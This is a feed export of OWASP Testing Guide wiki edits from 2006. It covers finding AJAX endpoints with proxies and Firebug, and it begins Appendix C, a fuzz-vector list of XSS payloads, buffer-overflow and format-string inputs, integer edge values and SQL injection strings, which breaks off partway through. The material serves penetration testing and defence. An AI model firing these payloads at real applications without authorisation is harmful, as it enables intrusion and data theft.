Data sent to POST requests is encoded in a similar format and included in the request after the headers:&lt;br /&gt;
&lt;br /&gt;
 param1=value1&amp;amp;key=value&lt;br /&gt;
&lt;br /&gt;
Unfortunately, server-side AJAX endpoints are not as easy or consistent to discover, and the format of actual valid requests is left to the AJAX framework in use or the discretion of the developer.  Therefore to fully test AJAX-enabled applications, testers need to be aware of the frameworks in use, the AJAX endpoints that are available, and the required format for requests to be considered valid.  Once this understanding has been developed, standard parameter manipulation techniques using a proxy can be used to test for SQL injection and other flaws.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Testing for AJAX Endpoints:''' &amp;lt;br&amp;gt;&lt;br /&gt;
Before an AJAX-enabled web application can be tested, the call endpoints for the asynchronous calls must be enumerated.  See [[Application_Discovery_AoC]] for more information about how traditional web applications are discovered.  For AJAX applications, there are two main approaches to determining call endpoints: parsing the HTML and JavaScript files and using a proxy to observe traffic.&lt;br /&gt;
&lt;br /&gt;
The advantage of parsing the HTML and JavaScript files in a web application is that it can provide a more comprehensive view of the server-side capabilities that can be accessed from the client side.  The drawback is that manually reviewing HTML and JavaScript content is tedious and, more importantly, the location and format of server-side URLs available to be accessed by AJAX calls are framework dependent.&lt;br /&gt;
&lt;br /&gt;
The tester should look through HTML and JavaScript files to find URLs of additional application surface exposure.  Searching for use of the XMLHttpRequest object in JavaScript code can help to focus these reviewing efforts.  Also, by knowing the names of included JavaScript files, the tester can determine which AJAX frameworks appear to be in use.  Once AJAX endpoints have been identified, the tester should further inspect the code to determine the format required of requests.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
[[Image:ExampleAtlasPage.PNG]]&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The advantage of using a proxy to observe traffic is that the actual requests demonstrate conclusively where the application is sending requests and what format those requests are in.  The disadvantage is that only the endpoints that the application actually makes calls to will be revealed.  The tester must fully exercise the remote application, and even then there could be additional call endpoints that are available but not actively in use.  In exercising the application, the proxy should observe traffic to both the user-viewable pages and the background asynchronous traffic to the AJAX endpoints.  Capturing this session traffic data allows the tester to determine all of the HTTP requests that are being made during the session as opposed to only looking at the user-viewable pages in the application.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
[[Image:ExampleAtlasRequest.jpg]]&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
By enumerating the AJAX endpoints available in an application and determining the required request format, the tester can set the stage for further analysis of the application.  Once endpoints and proper request formats have been determined, the tester can use a web proxy and standard web application parameter manipulation techniques to look for SQL injection and parameter tampering attacks.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Intercepting and debugging js code with Browsers'''&lt;br /&gt;
&lt;br /&gt;
By Using normal browsers it's possible to &lt;br /&gt;
analyze into detail js based web applications. &amp;lt;br&amp;gt;&lt;br /&gt;
Ajax calls in firefox can be intercepted by using &lt;br /&gt;
extension plugins that monitor the code flow. &amp;lt;br&amp;gt;&lt;br /&gt;
Two extensions providing this ability are &amp;quot;FireBug&amp;quot; and&lt;br /&gt;
&amp;quot;Venkman JavaScript Debugger&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
For Internet Explorer are available some tools &lt;br /&gt;
provided by Microsoft like &amp;quot;script Debugger&amp;quot;, &lt;br /&gt;
that permits real-time js debugging.&lt;br /&gt;
&lt;br /&gt;
By using Firebug on a page, a tester could find Ajax endpoints&lt;br /&gt;
by setting &amp;quot;Options-&amp;gt;Show XmlHttpRequest&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
[[Image:Firebug1.jpg]]&lt;br /&gt;
&lt;br /&gt;
From now on, any request accomplished by XMLHttpRequest object will be listed on the bottom of&lt;br /&gt;
the browser.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On the right of the Url is displayed source script and line from &lt;br /&gt;
where the call was done and by clicking on the displayed Url,&lt;br /&gt;
server response is shown.&amp;lt;br&amp;gt;&lt;br /&gt;
So it's straightforward to understand where the request is done,&lt;br /&gt;
what was the response and where is the endpoint. &amp;lt;br&amp;gt;&lt;br /&gt;
If the link to source script is clicked, the tester could find where the request originated.&lt;br /&gt;
&lt;br /&gt;
[[Image:Firebug_2.jpg]]&lt;br /&gt;
&lt;br /&gt;
As debugging Javascript is the way to learn how scripts build&lt;br /&gt;
urls, and how many parameters are available, by filling the form when the password is written down and the related input tag loses its focus, a new request is accomplished as could be seen on the following screenshot.&lt;br /&gt;
&lt;br /&gt;
[[Image:Firebug_3.jpg]]&lt;br /&gt;
&lt;br /&gt;
Now, by clicking on the link to  js source code, the tester has access to the next endpoint.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:Firebug_4.jpg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Then by setting breakpoints on some lines near the javascript endpoint, it's easy to know the call stack as shown in the next screenshot.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:Firebug_5.jpg]]&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for AJAX Endpoints:'''&amp;lt;br&amp;gt;&lt;br /&gt;
Access to additional information about the application source code can greatly speed efforts to enumerate AJAX endpoints, and the knowledge of what frameworks are in use will help the tester to understand the required format for AJAX requests.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
Knowledge of the frameworks being used and AJAX endpoints that are available helps the tester to focus his efforts and reduce the time required for discover and application footprinting.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* ...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
* The OWASP Sprajax tool [[Category:OWASP_Sprajax_Project]] can be used to spider web applications, identify AJAX frameworks in use, enumerate AJAX call endpoints, and fuzz those endpoints with framework-appropriate traffic.  At the current time, there is only support for the Microsoft Atlas framework (and detection for the Google Web Toolkit), but ongoing development should increase the utility of the tool.&lt;br /&gt;
* '''Venkman''' &amp;lt;br&amp;gt; [http://www.mozilla.org/projects/venkman/ Venkman]is the code name for Mozilla's JavaScript Debugger. Venkman aims to provide a powerful JavaScript debugging environment for Mozilla based browsers.&lt;br /&gt;
* ''' Ghost Train'''&amp;lt;br&amp;gt;[http://wiki.script.aculo.us/scriptaculous/show/GhostTrain Scriptaculous's Ghost Train] is a tool to ease the development of functional tests for web sites. It’s a event recorder, and a test-generating and replaying add-on you can use with any web application.&lt;br /&gt;
* '''Squish/Web (froglogic)'''&lt;br /&gt;
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows you to record, edit, and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests.&lt;br /&gt;
* '''JsUnit'''&amp;lt;br&amp;gt;[http://www.edwardh.com/jsunit/ JsUnit] is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Firebug_5.jpg&amp;diff=14479</id>
		<title>File:Firebug 5.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Firebug_5.jpg&amp;diff=14479"/>
				<updated>2006-12-18T20:15:57Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: Ajax Testing 5&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ajax Testing 5&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Firebug_4.jpg&amp;diff=14478</id>
		<title>File:Firebug 4.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Firebug_4.jpg&amp;diff=14478"/>
				<updated>2006-12-18T20:15:36Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: Ajax Testing 4&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ajax Testing 4&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Firebug_3.jpg&amp;diff=14477</id>
		<title>File:Firebug 3.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Firebug_3.jpg&amp;diff=14477"/>
				<updated>2006-12-18T20:15:09Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: Ajax Testing 3&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ajax Testing 3&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Firebug_2.jpg&amp;diff=14476</id>
		<title>File:Firebug 2.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Firebug_2.jpg&amp;diff=14476"/>
				<updated>2006-12-18T20:14:48Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: Ajax Testing 2&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ajax Testing 2&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Firebug1.jpg&amp;diff=14475</id>
		<title>File:Firebug1.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Firebug1.jpg&amp;diff=14475"/>
				<updated>2006-12-18T20:14:05Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: Ajax Testing 1&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ajax Testing 1&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=13702</id>
		<title>OWASP Testing Guide Appendix C: Fuzz Vectors</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=13702"/>
				<updated>2006-11-26T14:27:10Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: /* Passive SQL Injection (SQP) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following are fuzzing vectors which can be used with webscarab, jbrofuzz or another fuzzer.&lt;br /&gt;
Fuzzing is the &amp;quot;kitchen sink&amp;quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.&lt;br /&gt;
This is the simple part of the discovery phase.&lt;br /&gt;
Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.&lt;br /&gt;
&lt;br /&gt;
=== Fuzz Categories ===&lt;br /&gt;
&lt;br /&gt;
In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:&lt;br /&gt;
&lt;br /&gt;
* Recursive fuzzing&lt;br /&gt;
* Replasive fuzzing&lt;br /&gt;
&lt;br /&gt;
We examine and define each category in the sub-sections that follow. &lt;br /&gt;
&lt;br /&gt;
==== Recursive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Selecting &amp;quot;8302fa3b&amp;quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/00000000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/11000fff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/ffffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Replasive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Replasive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This is a form of replasive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. &lt;br /&gt;
&lt;br /&gt;
The remainder of this appendix presents a number of fuzz vector categories.&lt;br /&gt;
&lt;br /&gt;
=== Cross Site Scripting (XSS) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;STYLE&amp;gt;@import&amp;quot;javascript:alert('XSS')&amp;quot;;&amp;lt;/STYLE&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;'&amp;gt;&amp;lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;%22%27&amp;gt;&amp;lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt; &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;amp;quot;XSS&amp;lt;WBR&amp;gt;&amp;amp;amp;quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;amp;amp;#106;&amp;amp;amp;#97;&amp;amp;amp;#118;&amp;amp;amp;#97;&amp;amp;amp;&amp;lt;WBR&amp;gt;#115;&amp;amp;amp;#99;&amp;amp;amp;#114;&amp;amp;amp;#105;&amp;amp;amp;#112;&amp;amp;amp;&amp;lt;WBR&amp;gt;#116;&amp;amp;amp;#58;&amp;amp;amp;#97;&amp;amp;amp;#108;&amp;amp;amp;#101;&amp;amp;amp;&amp;lt;WBR&amp;gt;#114;&amp;amp;amp;#116;&amp;amp;amp;#40;&amp;amp;amp;#39;&amp;amp;amp;#88;&amp;amp;amp;#83&amp;lt;WBR&amp;gt;;&amp;amp;amp;#83;&amp;amp;amp;#39;&amp;amp;amp;#41&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG&lt;br /&gt;
SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;&amp;lt;WBR&amp;gt;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;&amp;lt;WBR&amp;gt;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;&amp;lt;WBR&amp;gt;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;&amp;lt;WBR&amp;gt;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;&amp;lt;WBR&amp;gt;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;&amp;lt;WBR&amp;gt;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;&amp;lt;WBR&amp;gt;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;&amp;lt;WBR&amp;gt;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;&amp;lt;WBR&amp;gt;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;&amp;lt;WBR&amp;gt;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x09;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0A;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0D;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Buffer Overflows (BFO) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here. &lt;br /&gt;
&lt;br /&gt;
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 5&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 17&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 33&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 65&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 129&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 257&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 513&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 1024&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 2049&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 4097&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 8193&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 12288&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Format String Errors (FSE) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%p%x%d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;.1024d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%.2049d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%p%p%p%p&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%x%x%x%x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%d%d%d%d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%s%s%s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%99999999999s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%08x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20n&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%s%s%s%s%s%s%s%s%s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%p%p%p%p%p%p%p%p%p%p&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s x 129&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%x x 257&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Integer Overflows (INT) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;-1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x100&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x1000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x3fffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x7ffffffe&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x7fffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x80000000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0xfffffffe&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0xffffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x10000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x100000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Passive SQL Injection (SQP) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;OR 1=1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR '1'='1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;; OR '1'='1'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+--+&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot; or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1=1 /*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 'a'='a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot; or &amp;quot;a&amp;quot;=&amp;quot;a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
